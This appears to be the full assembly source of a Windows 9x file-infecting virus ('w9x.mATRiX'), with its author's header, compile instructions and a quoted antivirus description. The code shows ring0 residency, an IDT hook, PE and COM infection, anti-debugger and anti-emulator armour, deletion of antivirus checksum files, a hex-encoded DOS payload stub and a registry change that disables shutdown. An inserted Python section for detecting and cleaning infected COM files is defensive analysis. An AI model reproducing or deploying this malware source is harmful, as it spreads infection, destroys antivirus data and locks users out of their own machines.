; Unload when dword at bff70400 <> 0h
; Beep at certain events (get resident, unload & infect)
; Beep can be turned off by changing byte ptr at bff70408 <> 0h
; only infects files at your D: drive (it's my test drive)
;
; I use WinIce to modify the values.
;
; Specs:
;
; Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
; SCR and COM (!) files. Com files are infected for the payload, a scene
; from The Matrix. The COM files are not really infected, but some date
; checking code and action is appended on it. When the month is equal
; to the date the payload will start.
;
; Infection : Increasing last section, and make a jump at original
; entrypoint to it (when modifying EP to last section
; AVPM will popup:( )
;
; Encryption : XOR'd and polymorphic-build-up-decryptors.
; Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE)
;
; Payload(s) : 2, as i said above 1 which is appended to all .com files
; on opening and c:\windows\win.com which will display
; 'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
; like in the movie (except the last sentence, w9x.mATRiX:)
; when the day is equal to the month (1 jan, 2 feb,etc.)
;
; the other payload will remove the shutdown command from
; the start menu using the registry - at 06 april.
;
; KnownBugs : None I know... I tested this code a lot, and a friend of mine
; : infected his own PC accidentally and it worked really well
; :)... The only problem is that F-prot hangs on infected
; files... hehe but that's not my problem :)
;
; Thanx to : Lord Julus, Billy Belcebu & Z0MBiE.
;
; Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-
; VX members,
; r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other
; people i met on #virus & #vir, and 29A & iKX for their
; nice magazines.
;
; and some non-virus greets:
;
; Ghostie :P, Hampy, nog wat XXXClan'ers, DJ Accelerator,
; King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
; PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.
;
; Compile: Tasm32 /m3 /ml LiFEwiRE.ASM,
; tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
; pewrsec LiFEwiRE.EXE
;
; Contact: Lifewire@mail.ru
;
;
;·─═─════─═════════════════════════════─·─════════════════════════════─═══─═─ · ÿ
;
;Description at www.viruslist.com
;
;Win95.Matrix
;
;
;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
;stays in the Windows memory as a device driver (VxD) by switching from
;application mode to Windows kernel (Ring3->Ring0), hooks disk file access
;functions, infects PE executable files with EXE and SCR file name
;extensions, and affects DOS COM files.
;
;While infecting a PE EXE file the virus encrypts itself and writes to the
;file end. The virus also patches program's startup code with a short routine
;that passes control to main virus code.
;
;While affecting DOS COM files the virus writes to the end of file a short
;routine that has no infection abilities, but just displays a message on
;July 7th:
;
; Wake up, Neo...
; The Matrix has you...
; w9x.mATRiX
;
;The virus also affects the C:\WINDOWS\WIN.COM file in the same way.
;
;On April 6th the virus modifies the system registry key:
;
;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1
;
;As a result of this key, a user cannot switch off the computer.
;
;The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
;CHKLIST.MS.
;
;The virus contains the text strings:
;
;[- comment from LiFEwiRE- AV'ers forgot to put the strings here??]
;
;where 'xxxxxxx' is the virus' "generation" number.
;
;
;·─═─════─═════════════════════════════─·─════════════════════════════─═══─═─ · ÿ
.486p
.model flat
locals
jumps

extrn ExitProcess:PROC; ;only 4 first gen.

;----- -[Equ's]- ------------------------------------------------------------;

debug equ 1 ;test/debug version?

virusz equ offset end - offset start


sectionflags equ 00000020h or 80000000h or 20000000h

if debug eq 1
inthook equ 05h ;let's hook this int for ring0
else
inthook equ 03h ;let's hook this int for ring0
endif

JmpToCodesz equ offset EndJmpToCode-offset JmpToCode

IFSMgr equ 0040h ;for VxDCall


InstallFileSystemApiHook equ 067h ;used in ring0 hooker
UniToBCSPath equ 041h ;used in hook to convert uni2ansi
Ring0_FileIO equ 032h ;for all file i/o

IFSFN_FILEATTRIB equ 21h ;hooked functions


IFSFN_OPEN equ 24h
IFSFN_RENAME equ 25h

R0_OPENCREATFILE equ 0D500h ;used with ring0_fileIO


R0_CLOSEFILE equ 0D700h
R0_WRITEFILE equ 0D601h
R0_READFILE equ 0D600h
R0_GETFILESIZE equ 0D800h
R0_FILEATTRIBUTES equ 04300h
GET_ATTRIBUTES equ 00h
SET_ATTRIBUTES equ 01h
R0_DELETEFILE equ 04100h

PC_STATIC equ 20000000h ;for allocating pages


PC_WRITEABLE equ 00020000h ;and protecting them from
PC_USER equ 00040000h ;ring3 code
PAGEZEROINIT equ 00000001h
PAGEFIXED equ 00000008h
PG_SYS equ 1

Get_DDB equ 0146h ;VMMCall to find S-ICE

PageAllocate equ 0053h


PageModifyPermissions equ 0133h

SizeInPages equ (virusz+1000 + 4095) / 4096

RegOpenKey equ 0148h ;used by payload for registery


RegSetValueEx equ 0152h ;modifying
HKEY_CURRENT_USER equ 80000001h ;
REG_DWORD equ 4 ;

debug_beep_FREQ equ 1700 ;for debugging


debug_beep_DELAY equ 50*65536

debug_beep_FREQ2 equ 700 ;for debugging


debug_beep_DELAY2 equ 100*65536

;----- -[Macro's]- ----------------------------------------------------------;

VxDCall macro vxd_id, service_id


int 20h
dw service_id
dw vxd_id
endm

VMMCall macro service_id ;Is just less work than doing


int 20h ;a VxDCall VMM, service
dw service_id
dw 0001h
endm

if debug eq 1
; display "Debug Version"
else
display " ░▒▓█ *Warning* This is the real version of the virus █▓▒░"
endif

;----- -[Code]- -------------------------------------------------------------;


_CODE segment dword use32 public 'CODE'

start:
pushad

call getdelta
getdelta:
pop ebp
sub ebp,offset getdelta

sub eax,00001000h ;Get imagebase at runtime


newEIP equ $-4

mov dword ptr [imagebase+ebp],eax

pushad

call setupSEHandKillEmu ;The call pushes the offset

mov esp,[esp+8] ;Error gives us old ESP
jmp backtocode

setupSEHandKillEmu:
xor edx,edx ;fs:[edx] = smaller then fs:[0]
push dword ptr fs:[edx] ;Push original SEH handler
mov fs:[edx],esp ;And put the new one (located
dec byte ptr cs:[edx] ;make error & let our SEH take
;control (not nice 4 emu's:)
backtocode:

pop dword ptr fs:[0]


pop edx ;pops EIP pushed by call setupSEH

popad

call SetupSEH ;to kill errors


;if eip gets here an error has occured

mov esp,[esp+8] ;contains old ESP

jmp RestoreSEH ;...

SetupSEH:
xor edx,edx ;we are save now, if an error
push dword ptr fs:[edx] ;occure EIP will be at the
mov fs:[edx],esp ;code after SetupSEH

push edx
sidt fword ptr [esp-2] ;'push' int table
pop edx ;restore stack from call and
;edx contains pointer to IDT

add edx,(inthook*8)+4 ;Get int vector

mov ebx,dword ptr [edx]


mov bx,word ptr [edx-4]

lea edi,dword ptr [ebp+Inthandler] ;routine to let int point to

mov word ptr [edx-4],di


shr edi,16 ;high/low word
mov word ptr [edx+2],di

int inthook ;call int, int will be ring0!

mov word ptr [edx-4],bx ;Restore old interrupt values


shr ebx,16
mov word ptr [edx+2],bx

RestoreSEH:

xor edx,edx
pop dword ptr fs:[edx]
pop edx ;pops offset pushed by CALL

mov edi,dword ptr [imagebase+ebp] ;--- Restore old bytes ---;


add edi,dword ptr [base+ebp] ;do at it ring0 to avoid
;page errorz
lea esi,[offset oldbytes+ebp]
mov ecx,JmpToCodesz
rep movsb ;restore bytes from host

popad

mov eax,00h ;--- return to host ---;


imagebase equ $-4
add eax,offset host -0400000h ;1st gen
base equ $-4

push eax
ret

;----------------------------------------------------------------------------;
; **** RING0 LOADER ****
;----------------------------------------------------------------------------;
Inthandler:
pushad
mov eax,0bff70404h ;already loaded?
cmp dword ptr [eax],eax
je back2ring3
mov dword ptr [eax],eax

push PAGEFIXED + PAGEZEROINIT


xor eax, eax
push eax ;PhysAddr
push eax ;maxPhys
push eax ;minPhys
push eax ;Align
push eax ;handle of VM = 0 if PG_SYS
push PG_SYS ;allocate memory in system area
push SizeInPages*2 ;nPages
VxD1V equ 00010053h
VxD1: VMMCall PageAllocate
add esp, 8*4

or eax,eax ;eax = place in mem


jz back2ring3 ;if zero error :(

mov edi,eax ;set (e)destination

push eax

push edi
lea esi,[offset start+ebp] ;set source
mov ecx,virusz ;virussize
cld ;you never know with poly :)
rep movsb ;copy virus to allocated mem
pop edi

mov dword ptr [edi+delta-start],edi

lea ecx,[edi+offset hook-offset start] ;Install FileSystem Hook


push ecx
VxD2V equ InstallFileSystemApiHook+256*256*IFSMgr
VxD2: VxDCall IFSMgr,InstallFileSystemApiHook
pop ecx

mov [edi+nexthook-start],eax

pop eax

push PC_STATIC
push 020060000h ;new paging settings
push SizeInPages*2
shr eax, 12
push eax
VxD5V equ 00010133h
VxD5: VMMCall PageModifyPermissions
add esp, 4*4

call CheckThePayloadDate ;(and mayB do something:)

if debug eq 1
call debug_beep2
endif

back2ring3:
if debug eq 1
call debug_beep
endif

popad
iretd ;exit int (to ring3!)
;----------------------------------------------------------------------------;

host:
oldbytes:
Push 0
Call ExitProcess
db JmpToCodesz-5 dup (176d)

;----------------------------------------------------------------------------;
; **** FILESYSTEM HOOK ****
;----------------------------------------------------------------------------;

hook:
push ebp
mov ebp,esp

sub esp,20h

push ebx
push esi
push edi

db 0bfh ;mov edi,DeltaInMem


delta dd 0

cmp dword ptr [busy-start+edi],not "BuSY" ;...are we busy?


je back

if debug eq 1
cmp dword ptr [death-start+edi],'TRUE'
je back
endif

mov eax,dword ptr [ebp+0Ch] ;EAX = Function


not eax

cmp eax,not IFSFN_OPEN ;File Open? try it


jz infect

cmp eax,not IFSFN_RENAME ;Rename? try it


jz infect

cmp eax,not IFSFN_FILEATTRIB ;File Attributes? try it


jz infect

back:
mov eax,[ebp+28] ; call the old
push eax
mov eax,[ebp+24]
push eax
mov eax,[ebp+20]
push eax
mov eax,[ebp+16]
push eax
mov eax,[ebp+12]
push eax
mov eax,[ebp+8]
push eax

db 0b8h
nexthook dd 0
call [eax]

add esp,6*4

pop edi
pop esi
pop ebx

leave
ret

;----------------------------------------------------------------------------;
; **** SOME CHECKS BEFORE INFECTING ****
;----------------------------------------------------------------------------;

infect:
pushad

if debug eq 1
mov eax,0bff70400h
mov eax,dword ptr [eax]
or eax,eax
jz stayalive ;kill ourself?

mov dword ptr [edi+death-start],'TRUE'

call debug_beep
call debug_beep2
call debug_beep2
call debug_beep2
call debug_beep

mov eax,0bff70400h

xor edx,edx
mov dword ptr [eax],edx
mov dword ptr [eax+4],edx

stayalive:

endif

mov dword ptr [busy-start+edi],not 'BuSY'

lea esi, [edi+filename-start] ;file buffer

mov eax, dword ptr [ebp+16]


cmp al,0ffh ;no drive defined?
je nopath
add al,40h ;a=1,b=2,a+40h='A',b+40h='B'
mov byte ptr [esi],al
mov word ptr [esi+1],':'
add esi,2
nopath:
xor eax,eax
push eax ;push 0 ;BCS/WANSI
inc ah ;ax=100h
push eax ;push 100h ;buf size
mov eax,[ebp+28]
mov eax,[eax+12]
add eax,4
push eax ;filename
push esi ;destination (buffer)

VxD3V equ UniToBCSPath+256*256*IFSMgr


VxD3: VxDCall IFSMgr, UniToBCSPath ;Convert to ASCII

add esp,4*4 ;restore stack


add esi,eax ;eax = length
mov byte ptr [esi],0 ;make ASCIIZ

mov eax,dword ptr [esi-4]

not eax ;
cmp eax,not 'EXE.' ;normal exe?
je infectit

cmp eax,not 'RCS.' ;screensaver?


je infectit

cmp eax,not 'MOC.' ;a com? (indeed !!:)


jne nocomfile
jmp payloadinfector
nocomfile:

quitinfect:

mov dword ptr [busy-start+edi],eax ;hope eax <> 'busy' :)


popad

jmp back

db "<w9x.mATRiX."
db virusz/1000 mod 10+'0'
db virusz/0100 mod 10+'0'
db virusz/0010 mod 10+'0'
db virusz/0001 mod 10+'0',"."
counter db "0001086 & MyLittlePoly." ;enough space for counter :)
db polysz/1000 mod 10+'0'
db polysz/0100 mod 10+'0'
db polysz/0010 mod 10+'0'
db polysz/0001 mod 10+'0'

if debug eq 1
db " Debug Version"
endif

db " by LiFEwiRE [sHAD0WvX]>"

dontinfect: ;when attrs. were already modified


pop esi ;get attribs + 1 = set
pop ecx ;old attrs
pop eax ;pointer to buffer with filen.
call R0_FileIO ;RESTORE ATTRIBUTES
jmp quitinfect

cryptkey dd 0
cryptkey2 dw 0
;----------------------------------------------------------------------------;
; **** REAL PE INFECTION PART ****
;----------------------------------------------------------------------------;

infectit:

lea esi, [edi+filename-start]

call checkname
jc quitinfect ;if name = bad

if debug eq 1
cmp word ptr [esi],":D"
jne quitinfect
endif

mov eax,R0_FILEATTRIBUTES + GET_ATTRIBUTES


push eax
call R0_FileIO

pop eax
inc eax ;eax=4300+1 = set
push eax
push ecx ;save attribs
push esi ;and esi,no new LEA needed
xor ecx,ecx ;new attr
call R0_FileIO

xor ecx,ecx ;ecx=0


mov edx,ecx ;
inc edx ;edx=1
mov ebx,edx ;
inc ebx ;ebx=2
mov eax,R0_OPENCREATFILE
call R0_FileIO
jc dontinfect

mov ebx,eax ;file handle

lea esi,[edi+pointertope-start] ;read pointer to PE at 3ch


mov ecx,4 ;into pointertope
mov edx,03ch
mov eax,R0_READFILE
call R0_FileIO

lea esi,[edi+peheader-start] ;peheader buffer


mov ecx,1024 ;1024 bytes
mov edx,dword ptr [edi+pointertope-start] ;pointer to pe header
mov eax,R0_READFILE ;...
call R0_FileIO

cmp word ptr [esi],'EP' ;is pe?


jne nope ;nope, its noPE :)

mov eax,0badc0deh ;already infected?


cmp dword ptr [esi+4ch],eax ;4ch = reserved
je nope
mov dword ptr [esi+4ch],eax

push ebp
push edi
push ebx ;save handle for after calcs.
mov ebp,edi

mov edi,esi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
;optionalheader+size=allocation table

;edi = PE/0/0, esi = allocation table

push esi
xor ecx,ecx
mov cx,word ptr [edi+6] ;put in ecx nr. of sections
xor eax,eax ;startvalue of eax
push cx ;
sectionsearch:
cmp dword ptr [esi+14h],eax ;is it the highest?
jb lower ;no
mov ebx,ecx ;remember section nr.
mov eax,dword ptr [esi+14h] ;and remember value
lower:
add esi,28h ;steps of 28h
loop sectionsearch
pop cx

sub ecx,ebx

mov eax,28h ;multiply with section length


mul ecx
pop esi
add esi,eax ;esi points now to section header

; Section header layout; Tdump names things differently (for example "rawdata")
;
;esi+0h 8h Section's name (.reloc, .idata, .LiFEwiRE)
; 8h 4h VirtualSize
; 0ch 4h RelativeVirtualAddress
; 10h 4h SizeOfRawData
; 14h 4h PointerToRawData
; 18h 4h PointerToRelocations
; 1ch 4h PointerToLinenumbers
; 20h 2h NumberOfRelocations
; 22h 2h NumberOfLinenumbers
; 24h 4h Characteristics

; ESI points to Section header, EDI points to PE

or [esi+24h],sectionflags ; Update section's flagz

mov edx,[esi+10h] ; EDX = SizeOfRawData


mov eax,edx ; EAX = SizeOfRawData
add edx,[esi+0Ch] ; EDX = New EIP
add eax,[esi+14h] ; EAX = Where append virus
push eax ; Save it

push esi

add eax,[esi+0Ch]
mov [edi+50h],eax

mov eax,[edi+28h] ;backup entry RVA


mov dword ptr [ebp+base-start],eax ;...
mov dword ptr [ebp+newEIP-start],edx ;save it
add edx,dword ptr [edi+34h] ;edx=neweip+imagebase

mov dword ptr [ebp+distance-start],edx ; Store the address

mov esi,edi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH

;ESI points to the allocation table,EDI to PE

;lets find the section which contains the RVA.

;then the place where to put the jump is entry-rva+phys.

sub esi,28h

look: add esi,28h


mov edx,eax ;Old EntryPoint (RVA)
sub edx,dword ptr [esi+0Ch] ;VirtualAddres
cmp edx,dword ptr [esi+08h] ;VirtualSize
jae look

sub eax,dword ptr [esi+0ch] ;sub RVA


add eax,dword ptr [esi+14h] ;add PhysicalOffset
;EAX is now the PhysicalOffset
;of the EntryPoint

or [esi+24h],sectionflags ; Update section's flagz

pop esi
pop edx
pop ebx

push edx ;
push esi
push eax

lea esi,[ebp+oldbytes-start] ;read pointer to PE at 3ch


mov ecx,JmpToCodesz ;into pointertope
mov edx,eax
mov eax,R0_READFILE
call R0_FileIO

mov word ptr [ebp+randombla-start],ax ;random value

pop edx ;and write new bytes at entry


lea esi,[ebp+JmpToCode-start] ;point to make code jmp to
mov eax,R0_WRITEFILE ;the section which contains
mov ecx,JmpToCodesz ;the viruscode (modifying the
call R0_FileIO ;entry RVA will alert AV's)

call VxDPatch ;unpatch VxDCalls (and VMM)

call IncCounter ;a ASCII counter rules

call encrypt ;encrypt,createpoly,returnsize (in ecx)

;encrypt-^ returns the virus size in ecx

mov eax,ecx
mov ecx,[edi+3Ch] ;ECX = Alignment
push edx ; Align
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
mov ecx,eax ;aligned size to append

pop esi

add [esi+10h],eax ; Size of rawdata


mov eax,[esi+10h] ;
add [esi+08h],eax ; & virtual size

pop edx
push edi
lea esi,[ebp+viruscopy-start] ;polymorfer returns size in
mov eax,R0_WRITEFILE ;the ECX register
push eax
call R0_FileIO ;append virus

pop eax
pop esi
mov ecx,1024
mov edx,[ebp+pointertope-start]
call R0_FileIO ;overwrite PE header

pop edi
pop ebp

nope:
mov eax,R0_CLOSEFILE
call R0_FileIO

if debug eq 1
call debug_beep
endif

call killAVfiles
call infectwindotcom ;for payload

jmp dontinfect

windotcom db "C:\WINDOWS\WIN.COM",0h ;for payload


sizewdc equ $-offset windotcom

avpcrc db 9,"AVP.CRC",0h
antivirdat db 14,"ANTI-VIR.DAT",0h
ivbntz db 9,"IVB.NTZ",0h
chklistms db 12,"CHKLIST.MS",0h

killAVfiles:
pushad
;first add the path to the filename
mov ebp,edi

lea edx,[offset avpcrc-start+ebp]

mov ecx,4
killing:
call killthisfile
xor ebx,ebx
mov bl,byte ptr [edx]
add edx,ebx
loop killing

popad

ret

killthisfile:
pushad
lea edi,[offset filename-start+ebp]
push edi

mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1

std
mov al,'\' ;search from right to left for the \
scasb
jne $-1

xor ecx,ecx

inc edi ;edi pointed to char before \


inc edi ;edi pointed to \

cld

mov esi,edx
lodsb
mov cl,al
rep movsb

pop esi
mov eax,R0_DELETEFILE
mov ecx,2027h
call R0_FileIO
popad
ret

;--------------------------------------------------------------------------
; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM ***
;--------------------------------------------------------------------------

infectwindotcomflag db 0h

infectwindotcom: ;called if virus is not resident


pushad
mov byte ptr [edi+offset infectwindotcomflag-start],'!'

push edi

lea esi,[offset windotcom-start+edi]


lea edi,[offset filename-start+edi]
mov ecx,sizewdc
cld
rep movsb
pop edi

jmp payloadinfector

backfrominfecting:

mov byte ptr [edi+offset infectwindotcomflag-start],173d ;-


popad
ret

;--------------------------------------------------------------------------

jmpop dw 0e990h ;nop & jmp


jmpval dw ?

;--------------------------------------------------------------------------

payloadinfector:
if debug eq 1
cmp dword ptr [esi-8],'PRUB' ;*BURP.COM ?
jne wegvancom
endif

lea esi, [edi+filename-start]

xor ecx,ecx ;ecx=0


mov edx,ecx ;
inc edx ;edx=1
mov ebx,edx ;
inc ebx ;ebx=2
mov eax,R0_OPENCREATFILE
call R0_FileIO
jc wegvancom

mov ebx,eax ;file handle

lea esi,[edi+first4bts-start] ;read first 4 bytes
mov ecx,4
xor edx,edx
mov eax,R0_READFILE
call R0_FileIO

cmp word ptr [edi+first4bts-start],'ZM' ;a renamed EXE ??
je closecomfile

cmp word ptr [edi+first4bts-start],0e990h ;already infected?
je closecomfile

mov eax,R0_GETFILESIZE
call R0_FileIO ;get its size

cmp eax,0ffffh-0100h-dospayloadsize ;infectable?
ja closecomfile

push eax

sub eax,4
mov word ptr [edi+jmpval-start],ax ;distance to jmp

lea esi,[edi+offset jmpop-start] ;Write new jMP at 0h
mov eax,R0_WRITEFILE
mov ecx,4
xor edx,edx
push eax
call R0_FileIO

pop eax
pop edx ;place to append
push edx
lea esi,[edi+offset dospayload-start]
mov ecx,dospayloadsize
call R0_FileIO

pop edx ;read 7 bytes before the end
push edx
sub edx,7
mov ecx,7
mov eax,R0_READFILE
lea esi,[edi+offset filename-start] ;just a buffer
call R0_FileIO

pop edx

cmp word ptr [edi+offset filename-start+3],'SN' ;ENUNS? (ENU is
jne closecomfile ;optional)

add word ptr [edi+offset filename-start+5],dospayloadsize+7

mov ecx,7

lea esi,[edi+offset filename-start]
mov eax,R0_WRITEFILE
add edx,dospayloadsize
call R0_FileIO ;append updated ENUNS

closecomfile:
mov eax,R0_CLOSEFILE
call R0_FileIO

wegvancom:

if debug eq 1
call debug_beep
endif

cmp byte ptr [edi+offset infectwindotcomflag-start],'!'
je backfrominfecting

jmp quitinfect
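The check sequence above leaves three file-level facts that an analyst can turn into detection and cleaning logic: the `nop; jmp rel16` (bytes 90h E9h) stamped over the first 4 bytes, which the infector itself uses as its already-infected marker and whose target is the original end of file; the block appended at that point, 234 bytes of DOS stub (counted from the `dospayload` db lines later in the listing) followed by the 4-byte `first4bts` slot holding the overwritten original bytes; and, when the file ends in the 7-byte self-check trailer with 'NS' at bytes 3..4, a copy of that trailer re-appended with its checksum word raised by 238+7. The Python below is an added example written from those facts; it is not code from the zine or from the virus. `build_sample` constructs a test fixture with placeholder stub bytes (no payload) so the triage and cleaning functions can be exercised offline.

```python
"""Triage and cleaning helpers for .COM files modified by the payloadinfector routine.
Added example: not code from the zine or from the virus. Layout facts come from the
listing; all sample data is constructed."""
import struct

MARKER = b"\x90\xE9"            # 'nop; jmp' word 0E990h, little-endian; the reinfection check
STUB_SIZE = 234                 # DOS stub bytes (0EAh) counted from the dospayload db lines
APPENDED_SIZE = STUB_SIZE + 4   # plus the first4bts slot holding the original first 4 bytes
TRAILER_SIZE = 7                # self-check trailer: 3 bytes, 'NS', 16-bit checksum word


def selfcheck_trailer(data: bytes):
    """Return (checksum_word, trailer_bytes) if the last 7 bytes carry 'NS' at offset 3,
    which is the only test the infector applies, else None."""
    if len(data) < TRAILER_SIZE:
        return None
    trailer = data[-TRAILER_SIZE:]
    if trailer[3:5] != b"NS":
        return None
    return struct.unpack_from("<H", trailer, 5)[0], trailer


def triage_com(data: bytes) -> dict:
    """Classify a .COM image. The jmp at offset 1 is relative to the end of the 4-byte
    patch and the infector sets it to (filesize - 4), so its target is the original end
    of file; the appended block, with or without a re-appended trailer, must fill the rest."""
    info = {
        "exe_header": data[:2] in (b"MZ", b"ZM"),   # renamed EXE: the infector skips these
        "marker": data[:2] == MARKER,
        "appended_at": None,
        "layout_ok": False,
        "trailer": selfcheck_trailer(data),
    }
    if info["marker"] and len(data) >= 4:
        target = 4 + struct.unpack_from("<H", data, 2)[0]
        info["appended_at"] = target
        extra = len(data) - target
        info["layout_ok"] = extra in (APPENDED_SIZE, APPENDED_SIZE + TRAILER_SIZE)
    return info


def clean_com(data: bytes) -> bytes:
    """Rebuild the original image: take the saved first 4 bytes from the first4bts slot
    and drop everything from the original end of file on. The original trailer, if the
    file had one, is still in place inside the body, so nothing else needs restoring."""
    info = triage_com(data)
    if not (info["marker"] and info["layout_ok"]):
        raise ValueError("not a file modified by this infector")
    n = info["appended_at"]
    saved = data[n + STUB_SIZE:n + APPENDED_SIZE]
    return saved + data[4:n]


def build_sample(original: bytes) -> bytes:
    """Constructed test fixture reproducing only the on-disk layout described above, with
    0x90 placeholder bytes where the stub would be. Exists to exercise the functions offline."""
    n = len(original)
    out = MARKER + struct.pack("<H", n - 4) + original[4:]
    out += b"\x90" * STUB_SIZE + original[:4]
    found = selfcheck_trailer(original)
    if found:
        checksum, trailer = found
        new_sum = (checksum + APPENDED_SIZE + TRAILER_SIZE) & 0xFFFF
        out += trailer[:5] + struct.pack("<H", new_sum)
    return out
```

`triage_com` deliberately requires the appended block to account for every byte past the jump target; a file that merely starts with 90h E9h but has a different tail is reported as marked but not `layout_ok`, which keeps the cleaner from rewriting something this routine did not produce.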

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; *** BEEPS used if debug equ 1 ***
;--------------------------------------------------------------------------

if debug eq 1
debug_beep:
push eax
push ecx

mov eax,0bff70408h
cmp byte ptr [eax],0
jne geenirritantgebiepvandaag

mov al, 0B6h
out 43h, al

mov al, (12345678h/debug_beep_FREQ) and 255
out 42h, al
mov al, ((12345678h/debug_beep_FREQ) shr 16) and 255
out 42h, al

in al, 61h
or al, 3
out 61h, al

mov ecx, debug_beep_DELAY
loop $

in al, 61h
and al, not 3
out 61h, al

pop ecx
pop eax
ret

debug_beep2:
push eax
push ecx

mov al, 0B6h
out 43h, al

mov al, (12345678h/debug_beep_FREQ2) and 255
out 42h, al
mov al, ((12345678h/debug_beep_FREQ2) shr 16) and 255
out 42h, al

in al, 61h
or al, 3
out 61h, al

mov ecx, debug_beep_DELAY2
loop $

in al, 61h
and al, not 3
out 61h, al

geenirritantgebiepvandaag: ;blah, you won't understand this anyway, loser :P

pop ecx
pop eax
ret
endif

;--------------------------------------------------------------------------
; File I/O function; called many times, so a single call site is easier to patch
;--------------------------------------------------------------------------

R0_FileIO:
VxD4V equ Ring0_FileIO+256*256*IFSMgr
VxD4: VxDCall IFSMgr, Ring0_FileIO
ret

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; Increases the ASCII counter of infections
;--------------------------------------------------------------------------

IncCounter: ;increments an ASCII counter... when there are more than
;9999999 files infected it contains a bug, but I don't
lea esi,[offset counter-start+6+ebp] ;expect that from this vir :)

next:
inc byte ptr [esi]
cmp byte ptr [esi],'9'+1
jb ok
mov byte ptr [esi],'0'
dec esi
jmp next
ok:
ret

;--------------------------------------------------------------------------

;------------------------------------------------------------------------------
; Some things used in the registry payload
;------------------------------------------------------------------------------

KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
valuename1 db "NoClose",0h ;no shutdown :)
ValueToSet dd 1h

CheckThePayloadDate:

mov al,07h ;Get day
out 70h,al ;(returns it in hex btw!)
in al,71h

cmp al,06h ;Is it 6th?
jnz noPayload

mov al,08h ;Get month
out 70h,al ;(returns it in hex btw!)
in al,71h

cmp al,04h ;Is it 4th?
jnz noPayload ;(

lea eax,[offset pointertope+ebp] ;just a buffer
push eax
lea eax,[offset KeyOfPolicies+ebp] ;open this key
push eax
push HKEY_CURRENT_USER ;
VxD6V equ RegOpenKey+256*256*1
VxD6: VMMCall RegOpenKey

add esp,3*4 ;reset stackpointer
push 4 ;length of value
lea eax,[offset ValueToSet+ebp] ;set value true
push eax
push REG_DWORD ;type
push 0 ;reserved
lea eax,[offset valuename1+ebp]
push eax
push [pointertope+ebp] ;handle
VxD7V equ RegSetValueEx+256*256*1 ;1 = VMM
VxD7: VMMCall RegSetValueEx

add esp,6*4

noPayload:
ret

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; Patches the VxDCalls (at run time Windows rewrites them into real calls)
;--------------------------------------------------------------------------

VxDPatch:
pushad
mov bx,020cdh ;int 20 used by VxDCall

mov word ptr [VxD1-start+ebp],bx ;int 20
mov dword ptr [VxD1-start+ebp+2],VxD1V ;dd with IFSMGR & fn.

mov word ptr [VxD2-start+ebp],bx
mov dword ptr [VxD2-start+ebp+2],VxD2V

mov word ptr [VxD3-start+ebp],bx
mov dword ptr [VxD3-start+ebp+2],VxD3V

mov word ptr [VxD4-start+ebp],bx
mov dword ptr [VxD4-start+ebp+2],VxD4V

mov word ptr [VxD5-start+ebp],bx
mov dword ptr [VxD5-start+ebp+2],VxD5V

mov word ptr [VxD6-start+ebp],bx
mov dword ptr [VxD6-start+ebp+2],VxD6V

mov word ptr [VxD7-start+ebp],bx
mov dword ptr [VxD7-start+ebp+2],VxD7V

popad
ret

;--------------------------------------------------------------------------

rnd32_seed dd 0h

;------ this code is put at the host's EIP and jumps to the virus code ------------;
JmpToCode:
stc
db 066h,0fh,083h ;jnc
randombla dw ? ;some place
mov eax,12345678h
distance equ $-4
push eax
ret
EndJmpToCode:
;----------------------------------------------------------------------------;

;this sweet code will be appended to .com files (234 / 0eah bytes large)

dospayload label byte
db 0e8h,09h,00h,0ebh,012h,08bh,0ech,083h,0c4h,020h,0ebh,04h,0ebh
db 0fch,0cdh,021h,0e8h,02ch,00h,0ebh,0eeh,0e2h,0f9h,058h,08bh
db 0ech,02dh,03h,01h,0fbh,095h,0b4h,04ch,080h,0ech,022h,0cdh,021h
db 080h,0feh,07h,075h,05h,080h,0fah,07h,074h,017h,0beh,0eah,01h
db 03h,0f5h,0bfh,00h,01h,0a5h,0a5h,0b8h,00h,01h,050h,0c3h,0ebh
db 05h,0b8h,00h,04ch,0cdh,021h,0c3h,0beh,058h,01h,03h,0f5h,08bh
db 0feh,0b9h,092h,00h,0fch,0ach,0f6h,0d8h,0aah,0e2h,0fah,018h
db 07dh,00h,098h,00h,048h,0f9h,047h,0f6h,00h,018h,08dh,00h,042h
db 070h,0ffh,0fdh,0bh,018h,0a8h,00h,018h,0abh,00h,047h,0d4h,0ffh
db 018h,09eh,00h,018h,0b4h,00h,06h,015h,02h,0a0h,04ch,0d4h,033h
db 0dfh,076h,026h,04ch,0d4h,033h,0dfh,0d6h,02dh,080h,06h,0ech
db 08eh,0bh,09fh,03dh,0a9h,09fh,095h,09bh,0e0h,08bh,090h,0d4h
db 0e0h,0b2h,09bh,091h,0d2h,0d2h,0d2h,00h,0ach,098h,09bh,0e0h
db 0b3h,09fh,08ch,08eh,097h,088h,0e0h,098h,09fh,08dh,0e0h,087h
db 091h,08bh,0d2h,0d2h,0d2h,00h,089h,0c7h,088h,0d2h,093h,0bfh
db 0ach,0aeh,097h,0a8h,0e0h,0adh,0aah,0a8h,00h,018h,0eah,00h,0cdh
db 01h,04ch,0f6h,054h,055h,018h,055h,01h,0f6h,040h,08bh,09h,047h
db 0e2h,00h,018h,05fh,01h,01eh,05h,03dh,048h,0fdh,00h,033h,0f0h
